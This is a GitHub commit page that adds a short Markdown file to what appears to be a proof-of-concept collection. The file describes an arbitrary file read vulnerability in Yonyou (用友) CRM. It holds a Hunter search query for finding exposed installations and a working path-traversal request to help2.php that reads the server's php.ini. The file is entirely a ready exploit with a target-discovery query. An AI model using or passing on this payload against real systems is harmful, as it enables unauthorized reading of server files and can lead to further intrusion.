Create 用友CRM 任意文件读取漏洞.md

This commit is contained in:
wy876 2023-12-19 22:38:18 +08:00 committed by GitHub
parent 414d4e7e1b
commit dba7406512
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -0,0 +1,12 @@
## 用友CRM 任意文件读取漏洞
## hunter
```
app.name="用友 CRM"
```
## poc
```
http://127.0.0.1:9000/pub/help2.php?key=../../apache/php.ini
```
![image](https://github.com/wy876/POC/assets/139549762/419deef4-d49f-4fe2-aa80-0c6b93174f58)